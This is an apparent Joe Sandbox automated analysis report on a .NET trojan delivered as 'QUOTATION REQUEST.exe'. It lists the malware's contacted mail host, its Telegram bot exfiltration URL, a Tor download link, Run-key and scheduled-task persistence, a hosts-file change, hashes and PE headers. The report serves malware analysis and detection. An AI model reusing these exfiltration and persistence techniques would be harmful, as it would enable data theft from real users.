              https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
              https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
              https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              mail.hemetek.com
              107.6.134.138
              truetrueunknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://127.0.0.1:HTTP/1.1RegSvcs.exe, 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              low
              http://DynDns.comDynDNSRegSvcs.exe, 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://C0BJotQhI3.netRegSvcs.exe, 00000003.00000002.465723831.0000000003696000.00000004.00000001.sdmp, RegSvcs.exe, 00000003.00000002.465745478.00000000036A0000.00000004.00000001.sdmp, RegSvcs.exe, 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmp, RegSvcs.exe, 00000003.00000002.465591581.0000000003659000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://TDhznh.comRegSvcs.exe, 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegSvcs.exe, 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQUOTATION REQUEST.exe, 00000000.00000002.212172469.0000000002AA1000.00000004.00000001.sdmpfalse
                high
                https://api.telegram.org/bot%telegramapi%/QUOTATION REQUEST.exe, 00000000.00000002.212843504.0000000003B43000.00000004.00000001.sdmp, RegSvcs.exe, 00000003.00000002.462144655.0000000000402000.00000040.00000001.sdmpfalse
                  high
                  http://mail.hemetek.comRegSvcs.exe, 00000003.00000002.465723831.0000000003696000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------xRegSvcs.exe, 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmpfalse
                    high
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipQUOTATION REQUEST.exe, 00000000.00000002.212843504.0000000003B43000.00000004.00000001.sdmp, RegSvcs.exe, 00000003.00000002.462144655.0000000000402000.00000040.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://api.ipify.orgGETMozilla/5.0RegSvcs.exe, 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    107.6.134.138
                    unknownUnited States
                    32475SINGLEHOP-LLCUStrue

                    General Information

                    Joe Sandbox Version:31.0.0 Red Diamond
                    Analysis ID:321450
                    Start date:22.11.2020
                    Start time:08:24:11
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 7m 52s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:QUOTATION REQUEST.exe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:28
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.adwa.spyw.evad.winEXE@10/8@1/1
                    EGA Information:Failed
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .exe
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 52.255.188.83, 104.43.193.48, 168.61.161.212, 51.104.139.180, 92.122.144.200, 20.54.26.129, 8.248.147.254, 8.241.9.126, 8.248.117.254, 8.241.121.126, 8.248.125.254, 8.253.204.121, 8.241.123.254, 8.241.121.254, 92.122.213.194, 92.122.213.247, 51.104.144.132
                    • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs.microsoft.com, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    08:24:55API Interceptor62x Sleep call for process: QUOTATION REQUEST.exe modified
                    08:25:10API Interceptor843x Sleep call for process: RegSvcs.exe modified
                    08:25:22AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run lEmohP C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe
                    08:25:30AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run lEmohP C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    107.6.134.138XbJ1zfehhU.exeGet hashmaliciousBrowse
                      shipping documents.exeGet hashmaliciousBrowse

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        mail.hemetek.comXbJ1zfehhU.exeGet hashmaliciousBrowse
                        • 107.6.134.138
                        shipping documents.exeGet hashmaliciousBrowse
                        • 107.6.134.138

                        ASN

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        SINGLEHOP-LLCUSpayment advice.xlsGet hashmaliciousBrowse
                        • 65.60.1.236
                        https://app.clio.com/link/AxWtfjmmzhjaGet hashmaliciousBrowse
                        • 198.143.164.252
                        http://img.delta-search.comGet hashmaliciousBrowse
                        • 198.143.128.241
                        https://achas.com.br/wp-includes/certificates/ssl.htmlGet hashmaliciousBrowse
                        • 198.143.164.252
                        Sales_Invoice_503657_415470.xlsGet hashmaliciousBrowse
                        • 107.6.152.20
                        EjwyvX23Ry.exeGet hashmaliciousBrowse
                        • 96.127.138.234
                        XbJ1zfehhU.exeGet hashmaliciousBrowse
                        • 107.6.134.138
                        Invoice.exeGet hashmaliciousBrowse
                        • 172.96.186.206
                        HMT-200810-02.exeGet hashmaliciousBrowse
                        • 107.6.169.82
                        http://lzuanhi.glorygc.com/%40120%40240%40Get hashmaliciousBrowse
                        • 69.175.104.242
                        shipping documents.exeGet hashmaliciousBrowse
                        • 107.6.134.138
                        PROOF OF PAYMENT.exeGet hashmaliciousBrowse
                        • 198.20.116.197
                        20200728.docGet hashmaliciousBrowse
                        • 198.20.110.125
                        IBC_100120_CTX_102720.docGet hashmaliciousBrowse
                        • 184.154.69.125
                        IBC_100120_CTX_102720.docGet hashmaliciousBrowse
                        • 184.154.69.125
                        PO SHEET pdf.exeGet hashmaliciousBrowse
                        • 96.127.138.234
                        SELECTED PRODUCTS NEEDED pdf.exeGet hashmaliciousBrowse
                        • 96.127.138.234
                        iArpr7yhpo.exeGet hashmaliciousBrowse
                        • 96.127.138.234
                        Byxmlltd72.exeGet hashmaliciousBrowse
                        • 69.175.35.82
                        order confirmation nr. AB-1006779.pdf..exeGet hashmaliciousBrowse
                        • 96.127.138.234

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exekAUs7lSQgh.exeGet hashmaliciousBrowse
                          Invoice 802737.exeGet hashmaliciousBrowse
                            order SS21-031 - A30.exeGet hashmaliciousBrowse
                              SOA.exeGet hashmaliciousBrowse
                                updated statement of account showing a balance due.exeGet hashmaliciousBrowse
                                  INV.NO.213242021.exeGet hashmaliciousBrowse
                                    INV.NO.213000242021.exeGet hashmaliciousBrowse
                                      pdf.exeGet hashmaliciousBrowse
                                        statement of account.exeGet hashmaliciousBrowse
                                          FINAL DOC.exeGet hashmaliciousBrowse
                                            0nv9EKtCMv.exeGet hashmaliciousBrowse
                                              XbJ1zfehhU.exeGet hashmaliciousBrowse
                                                RC2jmpuEYE.exeGet hashmaliciousBrowse
                                                  QUATATION INQUIRY.exeGet hashmaliciousBrowse
                                                    SOA of AUGUST 2020.exeGet hashmaliciousBrowse
                                                      Quotation Inquiry.exeGet hashmaliciousBrowse
                                                        770k.exeGet hashmaliciousBrowse
                                                          c9AwI0x6lR.exeGet hashmaliciousBrowse
                                                            HoNa6vG013.exeGet hashmaliciousBrowse
                                                              SHIPPING DOCS..exeGet hashmaliciousBrowse

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION REQUEST.exe.log
                                                                Process:C:\Users\user\Desktop\QUOTATION REQUEST.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1301
                                                                Entropy (8bit):5.345637324625647
                                                                Encrypted:false
                                                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4VE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz5
                                                                MD5:6C42AAF2F2FABAD2BAB70543AE48CEDB
                                                                SHA1:8552031F83C078FE1C035191A32BA43261A63DA9
                                                                SHA-256:51D07DD061EA9665DA070B95A4AC2AC17E20524E30BF6A0DA8381C2AF29CA967
                                                                SHA-512:014E89857B811765EA7AA0B030AB04A2DA1957571608C4512EC7662F6A4DCE8B0409626624DABC96CBFF079E7F0F4A916E6F49C789E00B6E46AD37C36C806DCA
                                                                Malicious:true
                                                                Reputation:moderate, very likely benign file
                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lEmohP.exe.log
                                                                Process:C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:modified
                                                                Size (bytes):142
                                                                Entropy (8bit):5.090621108356562
                                                                Encrypted:false
                                                                SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
                                                                MD5:8C0458BB9EA02D50565175E38D577E35
                                                                SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
                                                                SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
                                                                SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                C:\Users\user\AppData\Local\Temp\tmpCA2.tmp
                                                                Process:C:\Users\user\Desktop\QUOTATION REQUEST.exe
                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1643
                                                                Entropy (8bit):5.191525678114239
                                                                Encrypted:false
                                                                SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBdtn:cbh47TlNQ//rydbz9I3YODOLNdq31
                                                                MD5:D155A8C3722582775D0A09941D62E98E
                                                                SHA1:C9CE75D6052B7F44106E2F9368ABF53188820A5E
                                                                SHA-256:B43968CF5253F83119264249CE652A2E5185CA84849315690B7603553876346B
                                                                SHA-512:12474769D5AFAA771441139D8FEE5F7AE4388F493FADC13E6DF2F37F0EFE76073711C9500D25C4F3F2C4938EF9BD64F5AB40841C6D5A862A3B1E6C11B347E5A9
                                                                Malicious:true
                                                                Reputation:low
                                                                Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                                C:\Users\user\AppData\Roaming\GtVSibeZGs.exe
                                                                Process:C:\Users\user\Desktop\QUOTATION REQUEST.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1733120
                                                                Entropy (8bit):7.16299397416884
                                                                Encrypted:false
                                                                SSDEEP:24576:5PrSLG9a8dlo91UFpecAFM1rWBJs0gb9m7:5PrSi888Waed9m7
                                                                MD5:4F4F697ADC79894CEEC42D5752B2790E
                                                                SHA1:390DE0E89B8C1C3D07DBD12DBB0149626453D12B
                                                                SHA-256:DC0CFF9E3BC575333097988F46E46F1925CEDF35329A749A642576601A45674C
                                                                SHA-512:DFF267C9EB3390F161E52841F8059CCF8EBF947A4F228265D16640A05CFB90B472EA9C6CB6A854CAE989CCAE728E3E2B52BC393BE1AFD19F873FE261DDB186B2
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 52%
                                                                Reputation:low
                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P._................................. ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc...............p..............@..B........................H............(..........@................................................*^..}.....(.......(.....*..o....*.s....*.s....*.s....*..o ...*..o!...*..( ...*"..o"...*..o#...*"..o$...*"..o%...*"..o&...*"..o'...*"..o(...*"..o)...*"..o*...*"..o+...*"..o,...*"..o-...*"..(....*"..(/...*.(0...*"..(1...*..(#...*.(2...*"..o3...*2......s4...*"..o5...*"..(6...*"..(7...*"..(8...*"..(&...*"..o9...*..o:...*"..(9...*..(;...*^..}.....(<......(+....*"..('...*:.(.....oc....*>.(......oc....*".([....
                                                                C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe
                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):45152
                                                                Entropy (8bit):6.149629800481177
                                                                Encrypted:false
                                                                SSDEEP:768:bBbSoy+SdIBf0k2dsYyV6Iq87PiU9FViaLmf:EoOIBf0ddsYy8LUjVBC
                                                                MD5:2867A3817C9245F7CF518524DFD18F28
                                                                SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
                                                                SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
                                                                SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: kAUs7lSQgh.exe, Detection: malicious, Browse
                                                                • Filename: Invoice 802737.exe, Detection: malicious, Browse
                                                                • Filename: order SS21-031 - A30.exe, Detection: malicious, Browse
                                                                • Filename: SOA.exe, Detection: malicious, Browse
                                                                • Filename: updated statement of account showing a balance due.exe, Detection: malicious, Browse
                                                                • Filename: INV.NO.213242021.exe, Detection: malicious, Browse
                                                                • Filename: INV.NO.213000242021.exe, Detection: malicious, Browse
                                                                • Filename: pdf.exe, Detection: malicious, Browse
                                                                • Filename: statement of account.exe, Detection: malicious, Browse
                                                                • Filename: FINAL DOC.exe, Detection: malicious, Browse
                                                                • Filename: 0nv9EKtCMv.exe, Detection: malicious, Browse
                                                                • Filename: XbJ1zfehhU.exe, Detection: malicious, Browse
                                                                • Filename: RC2jmpuEYE.exe, Detection: malicious, Browse
                                                                • Filename: QUATATION INQUIRY.exe, Detection: malicious, Browse
                                                                • Filename: SOA of AUGUST 2020.exe, Detection: malicious, Browse
                                                                • Filename: Quotation Inquiry.exe, Detection: malicious, Browse
                                                                • Filename: 770k.exe, Detection: malicious, Browse
                                                                • Filename: c9AwI0x6lR.exe, Detection: malicious, Browse
                                                                • Filename: HoNa6vG013.exe, Detection: malicious, Browse
                                                                • Filename: SHIPPING DOCS..exe, Detection: malicious, Browse
                                                                Reputation:moderate, very likely benign file
                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...zX.Z..............0..d..........V.... ........@.. ..............................."....`.....................................O.......8............r..`>.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...
                                                                C:\Windows\System32\drivers\etc\hosts
                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:modified
                                                                Size (bytes):11
                                                                Entropy (8bit):2.663532754804255
                                                                Encrypted:false
                                                                SSDEEP:3:iLE:iLE
                                                                MD5:B24D295C1F84ECBFB566103374FB91C5
                                                                SHA1:6A750D3F8B45C240637332071D34B403FA1FF55A
                                                                SHA-256:4DC7B65075FBC5B5421551F0CB814CAFDC8CACA5957D393C222EE388B6F405F4
                                                                SHA-512:9BE279BFA70A859608B50EF5D30BF2345F334E5F433C410EA6A188DCAB395BFF50C95B165177E59A29261464871C11F903A9ECE55B2D900FE49A9F3C49EB88FA
                                                                Malicious:true
                                                                Reputation:moderate, very likely benign file
                                                                Preview: ..127.0.0.1
                                                                \Device\ConDrv
                                                                Process:C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1141
                                                                Entropy (8bit):4.44831826838854
                                                                Encrypted:false
                                                                SSDEEP:24:zKLXkb4DObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0b4DQntKKH1MqJC
                                                                MD5:1AEB3A784552CFD2AEDEDC1D43A97A4F
                                                                SHA1:804286AB9F8B3DE053222826A69A7CDA3492411A
                                                                SHA-256:0BC438F4B1208E1390C12D375B6CBB08BF47599D1F24BD07799BB1DF384AA293
                                                                SHA-512:5305059BA86D5C2185E590EC036044B2A17ED9FD9863C2E3C7E7D8035EF0C79E53357AF5AE735F7D432BC70156D4BD3ACB42D100CFB05C2FB669EA22368F1415
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview: Microsoft (R) .NET Framework Services Installation Utility Version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):7.16299397416884
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:QUOTATION REQUEST.exe
                                                                File size:1733120
                                                                MD5:4f4f697adc79894ceec42d5752b2790e
                                                                SHA1:390de0e89b8c1c3d07dbd12dbb0149626453d12b
                                                                SHA256:dc0cff9e3bc575333097988f46e46f1925cedf35329a749a642576601a45674c
                                                                SHA512:dff267c9eb3390f161e52841f8059ccf8ebf947a4f228265d16640a05cfb90b472ea9c6cb6a854cae989ccae728e3e2b52bc393be1afd19f873fe261ddb186b2
                                                                SSDEEP:24576:5PrSLG9a8dlo91UFpecAFM1rWBJs0gb9m7:5PrSi888Waed9m7
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P.._................................. ........@.. ....................................@................................

                                                                File Icon

                                                                Icon Hash:1dbaf06060e0c2cc

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x53ef1e
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                Time Stamp:0x5FB7E850 [Fri Nov 20 16:01:20 2020 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:v4.0.30319
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                Entrypoint Preview

                                                                Instruction
                                                                jmp dword ptr [00402000h]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x13eecc0x4f.text
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1400000x69da8.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1aa0000xc.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x20000x13cf240x13d000False0.600012168523data7.33255664693IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
